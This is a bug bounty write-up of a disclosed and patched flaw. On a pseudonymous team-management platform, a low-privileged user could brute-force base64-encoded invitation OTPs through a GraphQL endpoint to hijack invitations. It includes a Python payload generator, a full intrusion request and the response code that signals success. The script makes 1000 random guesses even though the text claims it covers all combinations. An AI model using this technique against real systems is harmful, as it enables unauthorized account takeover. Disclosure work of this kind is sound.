$500 for Cracking Invitation Code For Unauthorized Access & Account Takeover

Hi everyone! Today, I’m excited to share a fascinating vulnerability I discovered in a platform we’ll call “ExampleSpark.” This particular security flaw allowed me to access and accept invitations meant for other users, leading to potential unauthorized access and account takeovers. Let’s dive into the details!

Understanding Target: ExampleSpark

ExampleSpark (a pseudonym for confidentiality) is a robust platform designed for team management and project collaboration. It provides comprehensive tools for managing users, projects, and permissions, making it an attractive target for exploring security vulnerabilities.

The Vulnerability:

The vulnerability I discovered is an authorization bypass that allows a low-privileged user to access and accept invitations intended for other users. This flaw can lead to unauthorized access and account takeovers if exploited effectively. Below, I’ll outline the steps to reproduce this vulnerability.

Steps to Reproduce:

Invite User:

Log in to the admin account on ExampleSpark.Navigate to the team management section.Invite a user, which generates an invitation link containing a base64-encoded token with the user ID and a 7-digit OTP (One-Time Password).

Access from Low-Level Account:

Log in to a low-level viewer permission account on ExampleSpark.

Extract User ID and OTP:

Go to the team management section and select the invited user.Extract the user ID from the URL https://app.examplespark.com/users/User:<user_id>.

Prepare Payload Word List:

Use the extracted user ID to create a payload in the format userid:otpcode (e.g., 018dee9c-a9be-04f8-0000-fb5b23eef4d2:39426NQ).Generate a wordlist with all possible 7-digit alphanumeric combinations, convert each to base64, and create a payload list.The payloads list can be generated by the use of below provided python code:-import random
import base64

def generate_otp():
# Generate a random 7-digit alphanumeric OTP
characters = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
otp = ''.join(random.choice(characters) for i in range(7))
return otp

def convert_to_base64(data):
# Convert the data to base64
data_bytes = data.encode('utf-8')
base64_encoded = base64.b64encode(data_bytes).decode('utf-8')
return base64_encoded

# Constant user ID
user_id = "018dee9c-a9be-04f8-0000-fb5b23eef4d2"

# Number of OTPs to generate (updated to 1000)
num_otps = 1000

# Generate payloads and create a list
payload_list = []

for _ in range(num_otps):
otp = generate_otp()
payload = f"{user_id}:{otp}"
base64_payload = convert_to_base64(payload)
payload_list.append(base64_payload)

# Print the generated payloads and their base64 representations
for i, payload in enumerate(payload_list, start=1):
print(f"Payload {i}: {payload}")

# You can now use the 'payload_list' for further processing.

Exploit Authorization Bypass:

Use a tool like Burp Suite’s Intruder to send a POST request to /graphql/frontend?n=AcceptInvitation with the payload list.POST /graphql/frontend?n=AcceptInvitation HTTP/2
Host: app.examplespark.com
Cookie: [session cookies]
Content-Length: 616
Sec-Ch-Ua: "Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json
Accept: */*
X-Graphql-Operation: AcceptInvitation
Sec-Ch-Ua-Platform: "Linux"
Origin: https://app.examplespark.com
Referer: https://app.examplespark.com/invitations/MDE4ZGVkZWUtZWZiZS0wNGY4LTAwMDAtN2I4YWRmZDAwYjQ1OjAxMzI2NQ
{"operationName":"AcceptInvitation","variables":{"invitation_key":"","name":"","password":""},"query":"mutation AcceptInvitation($invitation_key: String!, $name: String!, $password: String!) {\n accept_invitation(\n input: {invitation_key: $invitation_key, name: $name, password: $password}\n ) {\n account_id\n user {\n id\n status\n ...AuthUserLogin\n __typename\n }\n __typename\n }\n}\n\nfragment AuthUserLogin on User {\n id\n email\n display_name\n session_valid_until\n __typename\n}"}Select the invitation_key parameter and start the attack.

Account Takeover:

Monitor responses for a 200 OK status with code 1142, indicating successful acceptance of the invitation.Once the correct OTP is identified, the attacker can accept the invitation and gain unauthorized access, potentially escalating privileges depending on the invited user’s role.

Impact:

This vulnerability allows an attacker to bypass authorization mechanisms, accept invitations, and potentially take over higher-privileged accounts. The lack of rate limiting and the use of a predictable 7-digit OTP in base64 encoding make the platform susceptible to brute-force attacks.

Response and Resolution:

Upon reporting the issue to ExampleSpark, the security team acknowledged the severity and implemented a patch to secure the platform. They awarded me a bounty of $500, reflecting the medium severity of the vulnerability.

Takeaway:

This discovery emphasizes the importance of securing invitation mechanisms and use of strong encoding and implementing robust rate limiting to prevent brute-force attacks. Always ensure platforms are protected against such vulnerabilities to safeguard user accounts and maintain the integrity of system.